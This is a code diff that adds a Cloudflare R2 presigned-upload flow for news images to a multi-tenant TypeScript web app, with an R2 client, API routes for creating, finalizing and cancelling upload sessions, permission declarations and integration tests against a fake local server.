@@ -1,0 +1,176 @@
+/**
+ * Cloudflare R2 client for the news-media presigned upload flow (Issue #634,
+ * epic `news_portal`). `Bun.S3Client` (Bun-native, S3-API-compatible — R2 is
+ * S3-compatible; no npm AWS/S3 SDK per project constraint), same pattern as
+ * `sync-storage/infrastructure/object-storage-uploader.ts`: circuit breaker
+ * + timeout around every real network call. Deliberately a SEPARATE
+ * provider-circuit-breaker key (`news-media-r2`, not `object-storage`) so an
+ * outage in one bucket/credential pair never trips the breaker for the
+ * other — matching "Keputusan kunci #1" (separate bucket/credentials from
+ * `sync-storage`) in `.claude/skills/awcms-mini-news-portal/SKILL.md`.
+ *
+ * Every method here is called strictly OUTSIDE any DB transaction by its
+ * caller (route handlers under `src/pages/api/v1/media/news-images/`) —
+ * ADR-0006. `presignUploadUrl` is a pure, local HMAC signature computation
+ * (no network round-trip at all), but is still kept out of any `withTenant`/
+ * `sql.begin` block for the same reason: this file is the one and only
+ * place that touches R2 credentials/config, and keeping that discipline
+ * uniform (rather than "only the genuinely-networked calls count") avoids
+ * a future refactor accidentally moving a real network call inside a
+ * transaction by analogy with this one.
+ */
+import { getProviderCircuitBreaker } from "../../../lib/database/circuit-breaker";
+import { withTimeout } from "../../../lib/integration/timeout";
+
+const PROVIDER_KEY = "news-media-r2";
+const DEFAULT_TIMEOUT_MS = 10_000;
+const MAX_ERROR_MESSAGE_LENGTH = 500;
+
+function truncateError(message: string): string {
+  return message.length > MAX_ERROR_MESSAGE_LENGTH
+    ? `${message.slice(0, MAX_ERROR_MESSAGE_LENGTH)}…`
+    : message;
+}
+
+export type NewsMediaR2ClientConfig = {
+  accountId: string;
+  accessKeyId: string;
+  secretAccessKey: string;
+  bucket: string;
+  /** Override for tests only (a local fake S3-compatible HTTP server — same convention as `object-storage-uploader.ts`'s `R2UploaderConfig.endpoint`). */
+  endpoint?: string;
+  timeoutMs?: number;
+};
+
+export type NewsMediaR2PresignUploadInput = {
+  objectKey: string;
+  mimeType: string;
+  ttlSeconds: number;
+};
+
+export type NewsMediaR2HeadResult =
+  | { ok: true; exists: true; sizeBytes: number }
+  | { ok: true; exists: false }
+  | { ok: false; error: string };
+
+export type NewsMediaR2GetResult =
+  { ok: true; bytes: Uint8Array } | { ok: false; error: string };
+
+export type NewsMediaR2Client = {
+  /**
+   * Presigned `PUT` URL scoped to exactly one server-generated object key,
+   * expiring after `ttlSeconds` — never includes raw R2 credentials, only a
+   * signed URL (`full-online-r2-architecture.md` §8).
+   */
+  presignUploadUrl(input: NewsMediaR2PresignUploadInput): string;
+  /**
+   * Cheap existence + size check (§9 step 1) — always run BEFORE
+   * `getObject`, so an object that is already known to be missing or
+   * over-size never wastes bandwidth on a full `GET`.
+   */
+  headObject(objectKey: string): Promise<NewsMediaR2HeadResult>;
+  /**
+   * Full object `GET` (§9 steps 2/5) — the caller must have already
+   * confirmed via `headObject` that the real size is within
+   * `NEWS_MEDIA_R2_MAX_UPLOAD_BYTES`; this method does not itself cap the
+   * read, by design, because a partial/ranged read cannot be used for
+   * either MIME sniffing (needs the leading bytes at minimum, but a
+   * corrupt/truncated read could still coincidentally sniff clean) or a
+   * checksum that means anything (a checksum of a truncated read digest is
+   * NOT the checksum of the uploaded object).
+   */
+  getObject(objectKey: string): Promise<NewsMediaR2GetResult>;
+};
+
+export function createNewsMediaR2Client(
+  config: NewsMediaR2ClientConfig
+): NewsMediaR2Client {
+  const endpoint =
+    config.endpoint ?? `https://${config.accountId}.r2.cloudflarestorage.com`;
+  const timeoutMs = config.timeoutMs ?? DEFAULT_TIMEOUT_MS;
+  const client = new Bun.S3Client({
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket,
+    endpoint,
+    region: "auto"
+  });
+  const breaker = getProviderCircuitBreaker(PROVIDER_KEY);
+
+  return {
+    presignUploadUrl({ objectKey, mimeType, ttlSeconds }) {
+      return client.file(objectKey).presign({
+        method: "PUT",
+        expiresIn: ttlSeconds,
+        type: mimeType
+      });
+    },
+
+    async headObject(objectKey) {
+      const attemptedAt = new Date();
+
+      if (!breaker.canAttempt(attemptedAt)) {
+        return {
+          ok: false,
+          error: "News media R2 circuit breaker is open; skipping attempt."
+        };
+      }
+
+      try {
+        const file = client.file(objectKey);
+        const exists = await withTimeout(
+          file.exists(),
+          timeoutMs,
+          `news-media-r2 HEAD exists ${objectKey}`
+        );
+
+        if (!exists) {
+          // A clean "not found" answer is a successful HEAD call, not a
+          // provider malfunction — never trips the breaker.
+          breaker.recordSuccess(new Date());
+          return { ok: true, exists: false };
+        }
+
+        const stat = await withTimeout(
+          file.stat(),
+          timeoutMs,
+          `news-media-r2 HEAD stat ${objectKey}`
+        );
+
+        breaker.recordSuccess(new Date());
+        return { ok: true, exists: true, sizeBytes: stat.size };
+      } catch (error) {
+        breaker.recordFailure(new Date());
+        const message = error instanceof Error ? error.message : String(error);
+        return { ok: false, error: truncateError(message) };
+      }
+    },
+
+    async getObject(objectKey) {
+      const attemptedAt = new Date();
+
+      if (!breaker.canAttempt(attemptedAt)) {
+        return {
+          ok: false,
+          error: "News media R2 circuit breaker is open; skipping attempt."
+        };
+      }
+
+      try {
+        const file = client.file(objectKey);
+        const buffer = await withTimeout(
+          file.arrayBuffer(),
+          timeoutMs,
+          `news-media-r2 GET ${objectKey}`
+        );
+
+        breaker.recordSuccess(new Date());
+        return { ok: true, bytes: new Uint8Array(buffer) };
+      } catch (error) {
+        breaker.recordFailure(new Date());
+        const message = error instanceof Error ? error.message : String(error);
+        return { ok: false, error: truncateError(message) };
+      }
+    }
+  };
+}

--- a/src/modules/news-portal/module.ts
+++ b/src/modules/news-portal/module.ts
@@ -1,12 +1,65 @@
 import { defineModule } from "../_shared/module-contract";
+import { NEWS_MEDIA_PERMISSION_ACTIVITY_CODE } from "./domain/news-media-permissions";
 
 export const newsPortalModule = defineModule({
   key: "news_portal",
   name: "News Portal",
-  version: "0.1.0",
+  version: "0.2.0",
   status: "active",
   description:
-    "Editorial + media layer conceptually on top of blog_content/tenant_domain/visitor_analytics for a full-online, R2-only public news portal (epic `news_portal` #631-#642/#649). Issue #632 (this descriptor) adds ONLY the tenant module preset `news_portal_full_online_r2` (`module-management/domain/module-presets.ts`) and its activation readiness gate (`domain/news-portal-preset-readiness.ts`, `domain/news-media-r2-config.ts`, `application/apply-news-portal-preset.ts`) — no media object registry (#633), no upload endpoint (#634), no permissions/navigation/API of its own yet. Registered now (rather than deferred to a later issue) because the preset needs a real module key to enable/disable, matching `tenant_domain`'s own precedent (Issue #558 registered the descriptor ahead of its resolver/routes/admin UI). `permissions`/`navigation`/`api`/`settings`/`jobs`/`health` are deliberately left undeclared until the corresponding feature is real (same convention `visitor_analytics`, Issue #617, documented in its own module.ts test). `dependencies` deliberately does NOT list blog_content/tenant_domain/visitor_analytics despite the prose relationship above: this module has zero functional code importing/calling into any of them yet, and `blog_content`/`tenant_domain` themselves only depend on foundation modules (never on each other) for the exact same reason (see their own module.ts) — declaring a hard dependency here would make the reverse-dependency guard (`evaluateModuleDisable`'s MODULE_REVERSE_DEPENDENCY_ACTIVE) block disabling blog_content/tenant_domain/visitor_analytics for EVERY tenant (news_portal is enabled by default like every module), which broke existing integration tests when first tried (see git history/PR discussion) and is not something #632's own scope justifies. The preset's own `enabledModuleKeys` ordering (`module-management/domain/module-presets.ts`'s `planEnableOrder`) is what sequences enabling blog_content/tenant_domain/visitor_analytics before news_portal WITHIN one preset application — a permanent hard dependency is not needed for that.",
+    "Editorial + media layer conceptually on top of blog_content/tenant_domain/visitor_analytics for a full-online, R2-only public news portal (epic `news_portal` #631-#642/#649). Issue #632 added ONLY the tenant module preset `news_portal_full_online_r2` (`module-management/domain/module-presets.ts`) and its activation readiness gate (`domain/news-portal-preset-readiness.ts`, `domain/news-media-r2-config.ts`, `application/apply-news-portal-preset.ts`). Issue #633 added the tenant-scoped R2-only media object registry (schema + domain/application helpers), permission constants only (not yet wired into this descriptor). Issue #634 (this update) adds the direct-to-R2 presigned upload flow — `POST /api/v1/media/news-images/upload-sessions` (create), `.../{id}/finalize` (real R2 `GET` + magic-byte MIME sniffing + server-side SHA-256 checksum, NOT `HEAD`-only — see `news-media-r2-verification.ts`), `.../{id}/cancel` — and is the first issue with a real HTTP surface, so `permissions`/`api` are now declared below (matching `NEWS_MEDIA_PERMISSIONS`, `news-media-permissions.ts`, exactly — see that file's own header for why #634 must reuse those constants rather than invent `media_objects.news_images.*` names from the issue's own body text). `navigation`/`settings`/`jobs`/`health` remain deliberately undeclared — no admin UI page, per-tenant setting, background job, or health check exists yet for this module specifically (same convention `visitor_analytics`, Issue #617, used before its own features landed). `dependencies` deliberately does NOT list blog_content/tenant_domain/visitor_analytics despite the prose relationship above: this module has zero functional code importing/calling into any of them yet, and `blog_content`/`tenant_domain` themselves only depend on foundation modules (never on each other) for the exact same reason (see their own module.ts) — declaring a hard dependency here would make the reverse-dependency guard (`evaluateModuleDisable`'s MODULE_REVERSE_DEPENDENCY_ACTIVE) block disabling blog_content/tenant_domain/visitor_analytics for EVERY tenant (news_portal is enabled by default like every module), which broke existing integration tests when first tried (see git history/PR discussion) and is not something #632's own scope justifies. The preset's own `enabledModuleKeys` ordering (`module-management/domain/module-presets.ts`'s `planEnableOrder`) is what sequences enabling blog_content/tenant_domain/visitor_analytics before news_portal WITHIN one preset application — a permanent hard dependency is not needed for that.",
   dependencies: ["tenant_admin", "identity_access"],
-  type: "domain"
+  type: "domain",
+  api: {
+    openApiPath: "openapi/awcms-mini-public-api.openapi.yaml",
+    basePath: "/api/v1/media/news-images"
+  },
+  permissions: [
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "create",
+      description:
+        "Create a pending news media object / start a presigned upload session"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "read",
+      description: "Read news media object metadata"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "verify",
+      description: "Finalize/verify an uploaded news media object"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "attach",
+      description: "Attach a verified news media object to an owning resource"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "detach",
+      description: "Detach a news media object from its owning resource"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "delete",
+      description: "Soft delete news media object metadata"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "restore",
+      description: "Restore a soft-deleted news media object"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "purge",
+      description: "Hard purge an already soft-deleted news media object"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "cancel",
+      description: "Cancel one's own not-yet-uploaded news media upload session"
+    }
+  ]
 });

--- a/src/pages/api/v1/media/news-images/upload-sessions/[id]/cancel.ts
+++ b/src/pages/api/v1/media/news-images/upload-sessions/[id]/cancel.ts
@@ -1,0 +1,105 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import { recordAuditEvent } from "../../../../../../../modules/logging/application/audit-log";
+import {
+  fetchNewsMediaObjectById,
+  markNewsMediaObjectFailed
+} from "../../../../../../../modules/news-portal/application/news-media-object-directory";
+
+const CANCEL_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "media",
+  action: "cancel" as const
+};
+
+/**
+ * `POST /api/v1/media/news-images/upload-sessions/{id}/cancel` (Issue
+ * #634) — aborts a still-`pending_upload` session (nothing was ever
+ * verified/attached). Not high-risk enough to require `Idempotency-Key`:
+ * it never touches R2, and a repeated call after the first naturally
+ * resolves to a clean `409` (row is no longer `pending_upload`), matching
+ * this repo's existing `verify`/`set_primary` precedent for actions
+ * excluded from `HIGH_RISK_ACTIONS` (`identity-access/domain/access-control.ts`).
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const objectId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!objectId) {
+    return fail(400, "VALIDATION_ERROR", "Upload session id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CANCEL_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const row = await fetchNewsMediaObjectById(tx, tenantId, objectId);
+
+    if (!row) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Upload session not found.");
+    }
+
+    if (row.status !== "pending_upload") {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        `Cannot cancel an upload session in status "${row.status}".`
+      );
+    }
+
+    const cancelled = await markNewsMediaObjectFailed(tx, tenantId, objectId);
+
+    if (!cancelled) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        "Upload session state changed concurrently; retry."
+      );
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "news_portal",
+      action: "news_media.object.upload_cancelled",
+      resourceType: "news_media_object",
+      resourceId: objectId,
+      severity: "info",
+      message: `News media upload session cancelled: ${row.objectKey}.`,
+      attributes: { objectKey: row.objectKey },
+      correlationId
+    });
+
+    return ok(cancelled);
+  });
+};

--- a/src/pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts
+++ b/src/pages/api/v1/media/news-images/upload-sessions/[id]/finalize.ts
@@ -1,0 +1,79 @@
+import type { APIRoute } from "astro";
+
+import { fail } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { resolveAuthInputs } from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import { resolveNewsMediaR2Config } from "../../../../../../../modules/news-portal/domain/news-media-r2-config";
+import { validateFinalizeNewsMediaUploadSessionInput } from "../../../../../../../modules/news-portal/domain/news-media-upload-session-validation";
+import { finalizeNewsMediaUploadSession } from "../../../../../../../modules/news-portal/application/news-media-finalize-upload-session";
+
+/**
+ * `POST /api/v1/media/news-images/upload-sessions/{id}/finalize` (Issue
+ * #634) — step 5 of `r2-upload-sop.md` §2. Route only parses/validates the
+ * HTTP request and delegates to `finalizeNewsMediaUploadSession`
+ * (`application/news-media-finalize-upload-session.ts`), which performs
+ * the real R2 `GET` + magic-byte MIME sniffing + server-side SHA-256
+ * checksum this issue exists to add — see that module's own header for why
+ * `HEAD` alone (the Issue #631 security-auditor Critical finding) is never
+ * sufficient here.
+ *
+ * High-risk mutation — requires `Idempotency-Key` (skill
+ * `awcms-mini-idempotency`) since it promotes metadata to `verified`, the
+ * status editorial content is allowed to reference.
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const objectId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!objectId) {
+    return fail(400, "VALIDATION_ERROR", "Upload session id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const rawBody = await request.json().catch(() => null);
+  const validation = validateFinalizeNewsMediaUploadSessionInput(rawBody);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Finalize request is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  return finalizeNewsMediaUploadSession(
+    {
+      tenantId,
+      objectId,
+      tokenHash: hashSessionToken(token),
+      idempotencyKey,
+      claimedChecksumSha256: validation.value.checksumSha256,
+      now: new Date(),
+      correlationId: locals.correlationId
+    },
+    {
+      sql: getDatabaseClient(),
+      config: resolveNewsMediaR2Config()
+    }
+  );
+};

--- a/src/pages/api/v1/media/news-images/upload-sessions/index.ts
+++ b/src/pages/api/v1/media/news-images/upload-sessions/index.ts
@@ -1,0 +1,159 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import {
+  resolveNewsMediaR2Config,
+  findMissingNewsMediaR2Vars
+} from "../../../../../../modules/news-portal/domain/news-media-r2-config";
+import { validateCreateNewsMediaUploadSessionInput } from "../../../../../../modules/news-portal/domain/news-media-upload-session-validation";
+import { createPendingNewsMediaObject } from "../../../../../../modules/news-portal/application/news-media-object-directory";
+import { createNewsMediaR2Client } from "../../../../../../modules/news-portal/infrastructure/news-media-r2-client";
+
+const CREATE_GUARD = {
+  moduleKey: "news_portal",
+  activityCode: "media",
+  action: "create" as const
+};
+
+type CreateTxResult =
+  | { kind: "response"; response: Response }
+  | {
+      kind: "created";
+      objectId: string;
+      objectKey: string;
+      mimeType: string;
+      createdAt: Date;
+    };
+
+/**
+ * `POST /api/v1/media/news-images/upload-sessions` (Issue #634) — step 1 of
+ * the direct-to-R2 presigned upload flow (`r2-upload-sop.md` §2). Validates
+ * shape only (no bytes exist yet), creates a `pending_upload` metadata row
+ * with a server-generated object key, then generates a short-lived
+ * presigned `PUT` URL scoped to exactly that object key. The R2 call
+ * (`presignUploadUrl` — a local signature computation, not a network round
+ * trip) happens strictly AFTER the DB transaction commits, never inside it
+ * (ADR-0006).
+ */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const config = resolveNewsMediaR2Config();
+
+  if (!config.enabled || findMissingNewsMediaR2Vars().length > 0) {
+    return fail(
+      502,
+      "PROVIDER_ERROR",
+      "News media R2 storage is not configured for this deployment."
+    );
+  }
+
+  const validation = validateCreateNewsMediaUploadSessionInput(
+    await request.json().catch(() => null),
+    config.allowedMimeTypes,
+    config.maxUploadBytes
+  );
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Upload session request is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  const txResult = await withTenant<CreateTxResult>(
+    sql,
+    tenantId,
+    async (tx) => {
+      const auth = await authorizeInTransaction(
+        tx,
+        tenantId,
+        tokenHash,
+        now,
+        CREATE_GUARD
+      );
+
+      if (!auth.allowed) {
+        return { kind: "response", response: auth.denied };
+      }
+
+      const created = await createPendingNewsMediaObject(
+        tx,
+        tenantId,
+        auth.context.tenantUserId,
+        config,
+        {
+          mimeType: input.mimeType,
+          originalFilename: input.originalFilename ?? undefined,
+          altText: input.altText ?? undefined,
+          caption: input.caption ?? undefined
+        },
+        correlationId
+      );
+
+      return {
+        kind: "created",
+        objectId: created.id,
+        objectKey: created.objectKey,
+        mimeType: created.mimeType,
+        createdAt: created.createdAt
+      };
+    }
+  );
+
+  if (txResult.kind === "response") {
+    return txResult.response;
+  }
+
+  // Outside the DB transaction (ADR-0006) — presign is local/synchronous,
+  // never a network call, but this discipline is kept uniform regardless
+  // (see news-media-r2-client.ts's own header comment).
+  const r2Client = createNewsMediaR2Client({
+    accountId: config.accountId,
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket
+  });
+
+  const presignedUrl = r2Client.presignUploadUrl({
+    objectKey: txResult.objectKey,
+    mimeType: txResult.mimeType,
+    ttlSeconds: config.presignedUploadTtlSeconds
+  });
+
+  const expiresAt = new Date(
+    txResult.createdAt.getTime() + config.presignedUploadTtlSeconds * 1000
+  );
+
+  // Never include raw R2 credentials — only the already-signed URL.
+  return ok({
+    objectId: txResult.objectId,
+    objectKey: txResult.objectKey,
+    presignedUrl,
+    expiresAt: expiresAt.toISOString()
+  });
+};

--- a/tests/foundation.test.ts
+++ b/tests/foundation.test.ts
@@ -256,7 +256,8 @@ describe("database migration runner helpers", () => {
       "038_awcms_mini_visitor_analytics_permissions.sql",
       "039_awcms_mini_visitor_analytics_schema.sql",
       "040_awcms_mini_visitor_analytics_session_lookup_index.sql",
-      "041_awcms_mini_news_media_object_registry_schema.sql"
+      "041_awcms_mini_news_media_object_registry_schema.sql",
+      "042_awcms_mini_news_media_permissions.sql"
     ]);
     for (const migration of migrations) {
       expect(migration.checksum).toMatch(/^sha256:[a-f0-9]{64}$/);

--- a/tests/integration/news-media-object-registry.integration.test.ts
+++ b/tests/integration/news-media-object-registry.integration.test.ts
@@ -31,6 +31,7 @@ import {
   markNewsMediaObjectVerified,
   purgeNewsMediaObject,
   restoreNewsMediaObject,
+  revertNewsMediaObjectUploadClaim,
   softDeleteNewsMediaObject,
   UnsupportedNewsMediaMimeTypeInputError
 } from "../../src/modules/news-portal/application/news-media-object-directory";
@@ -403,6 +404,96 @@ suite("news media object directory — lifecycle + audit trail", () => {
       "news_media.object.created",
       "news_media.object.created"
     ]);
+  });
+
+  test("markNewsMediaObjectUploaded with no input claims the row atomically (WHERE status='pending_upload' guard) — a second claim attempt on the same row gets null, no audit event", async () => {
+    const sql = getDatabaseClient();
+    const created = await withTenant(sql, TENANT_A, (tx) =>
+      createPendingNewsMediaObject(tx, TENANT_A, ACTOR_ID, CONFIG, {
+        mimeType: "image/jpeg"
+      })
+    );
+
+    const firstClaim = await withTenant(sql, TENANT_A, (tx) =>
+      markNewsMediaObjectUploaded(tx, TENANT_A, created.id)
+    );
+    expect(firstClaim?.status).toBe("uploaded");
+    // No sizeBytes/checksumSha256 given at claim time — COALESCE leaves the
+    // columns untouched (NULL for a fresh row), per PR #653.
+    expect(firstClaim?.sizeBytes).toBeNull();
+    expect(firstClaim?.checksumSha256).toBeNull();
+
+    // Simulates a second concurrent `finalize` call's claim attempt losing
+    // the race — the row is no longer `pending_upload`, so this matches
+    // zero rows.
+    const secondClaim = await withTenant(sql, TENANT_A, (tx) =>
+      markNewsMediaObjectUploaded(tx, TENANT_A, created.id)
+    );
+    expect(secondClaim).toBeNull();
+
+    const auditActions = (await fetchAuditRows(TENANT_A)).map((r) => r.action);
+    expect(auditActions).toEqual(["news_media.object.created"]);
+  });
+
+  test("revertNewsMediaObjectUploadClaim: uploaded -> pending_upload, retryable via a fresh claim afterwards, no audit event", async () => {
+    const sql = getDatabaseClient();
+    const created = await withTenant(sql, TENANT_A, (tx) =>
+      createPendingNewsMediaObject(tx, TENANT_A, ACTOR_ID, CONFIG, {
+        mimeType: "image/jpeg"
+      })
+    );
+
+    await withTenant(sql, TENANT_A, (tx) =>
+      markNewsMediaObjectUploaded(tx, TENANT_A, created.id)
+    );
+
+    const reverted = await withTenant(sql, TENANT_A, (tx) =>
+      revertNewsMediaObjectUploadClaim(tx, TENANT_A, created.id)
+    );
+    expect(reverted?.status).toBe("pending_upload");
+
+    // The whole point of reverting — the session is retryable via a fresh
+    // claim, not permanently stuck.
+    const reclaimed = await withTenant(sql, TENANT_A, (tx) =>
+      markNewsMediaObjectUploaded(tx, TENANT_A, created.id)
+    );
+    expect(reclaimed?.status).toBe("uploaded");
+
+    const auditActions = (await fetchAuditRows(TENANT_A)).map((r) => r.action);
+    expect(auditActions).toEqual(["news_media.object.created"]);
+  });
+
+  test("revertNewsMediaObjectUploadClaim is a no-op (returns null) for a row not currently in 'uploaded' status", async () => {
+    const sql = getDatabaseClient();
+    const created = await withTenant(sql, TENANT_A, (tx) =>
+      createPendingNewsMediaObject(tx, TENANT_A, ACTOR_ID, CONFIG, {
+        mimeType: "image/jpeg"
+      })
+    );
+
+    // Still `pending_upload` — never claimed.
+    const revertedPending = await withTenant(sql, TENANT_A, (tx) =>
+      revertNewsMediaObjectUploadClaim(tx, TENANT_A, created.id)
+    );
+    expect(revertedPending).toBeNull();
+
+    await withTenant(sql, TENANT_A, (tx) =>
+      markNewsMediaObjectUploaded(tx, TENANT_A, created.id)
+    );
+    await withTenant(sql, TENANT_A, (tx) =>
+      markNewsMediaObjectVerified(tx, TENANT_A, ACTOR_ID, created.id, {})
+    );
+
+    // Already resolved to `verified` — reverting must not undo that.
+    const revertedVerified = await withTenant(sql, TENANT_A, (tx) =>
+      revertNewsMediaObjectUploadClaim(tx, TENANT_A, created.id)
+    );
+    expect(revertedVerified).toBeNull();
+
+    const row = await withTenant(sql, TENANT_A, (tx) =>
+      fetchNewsMediaObjectById(tx, TENANT_A, created.id)
+    );
+    expect(row?.status).toBe("verified");
   });
 
   test("a tenant A media object is invisible to tenant B's directory calls (cross-tenant rejection)", async () => {

--- a/tests/integration/news-media-upload-session-api.integration.test.ts
+++ b/tests/integration/news-media-upload-session-api.integration.test.ts
@@ -779,4 +779,186 @@ suite("news media presigned upload session API (Issue #634)", () => {
       fake.server.stop(true);
     }
   });
+
+  test("finalize: same Idempotency-Key replays the exact 422 rejection instead of hitting the (now 'failed') status guard", async () => {
+    const owner = await bootstrap("rejectreplayco");
+    const fake = startFakeR2Server();
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: {
+          mimeType: "image/jpeg",
+          byteSize: HTML_EXPLOIT_PAYLOAD.byteLength
+        }
+      });
+      fake.put(created.body.data.objectKey, HTML_EXPLOIT_PAYLOAD);
+
+      const deps = {
+        sql: getDatabaseClient(),
+        config: resolveNewsMediaR2Config(),
+        createR2Client: (config: ReturnType<typeof resolveNewsMediaR2Config>) =>
+          createNewsMediaR2Client({
+            accountId: config.accountId,
+            accessKeyId: config.accessKeyId,
+            secretAccessKey: config.secretAccessKey,
+            bucket: config.bucket,
+            endpoint: `http://127.0.0.1:${fake.server.port}`
+          })
+      };
+
+      const first = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "reject-replay-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        deps
+      );
+      expect(first.status).toBe(422);
+
+      const row = (await getAdminSql()`
+        SELECT status FROM awcms_mini_news_media_objects WHERE id = ${created.body.data.objectId}
+      `) as { status: string }[];
+      expect(row[0]!.status).toBe("failed");
+
+      // Same key, same request -> must replay the stored 422 exactly, NOT
+      // fall through to the `row.status !== "pending_upload"` guard (which
+      // would produce a DIFFERENT "Cannot finalize... status failed" 409 —
+      // breaking the idempotency replay contract, reviewer feedback PR #653).
+      const second = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "reject-replay-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        deps
+      );
+      expect(second.status).toBe(422);
+      expect(await second.json()).toEqual(await first.clone().json());
+    } finally {
+      fake.server.stop(true);
+    }
+  });
+
+  test("finalize: a transient R2 provider error (502) reverts the atomic claim — the same upload session is retryable with a fresh Idempotency-Key afterwards", async () => {
+    const owner = await bootstrap("providererrorco");
+
+    let getAttempts = 0;
+    const store = new Map<string, Uint8Array>();
+    const prefix = `/${R2_BUCKET}/`;
+    const flakyServer = Bun.serve({
+      port: 0,
+      fetch(request) {
+        const url = new URL(request.url);
+        if (!url.pathname.startsWith(prefix)) {
+          return new Response("not found", { status: 404 });
+        }
+        const key = url.pathname.slice(prefix.length);
+        const bytes = store.get(key);
+
+        if (request.method === "HEAD") {
+          if (!bytes) return new Response(null, { status: 404 });
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": String(bytes.byteLength) }
+          });
+        }
+
+        if (request.method === "GET") {
+          getAttempts += 1;
+          if (getAttempts === 1) {
+            // Simulate a transient R2 failure on the FIRST GET only — the
+            // second (post-retry) GET succeeds normally.
+            return new Response("internal error", { status: 500 });
+          }
+          if (!bytes) return new Response(null, { status: 404 });
+          const arrayBuffer = bytes.buffer.slice(
+            bytes.byteOffset,
+            bytes.byteOffset + bytes.byteLength
+          ) as ArrayBuffer;
+          return new Response(arrayBuffer, { status: 200 });
+        }
+
+        return new Response("method not supported by fake server", {
+          status: 405
+        });
+      }
+    });
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: REAL_JPEG_BYTES.byteLength }
+      });
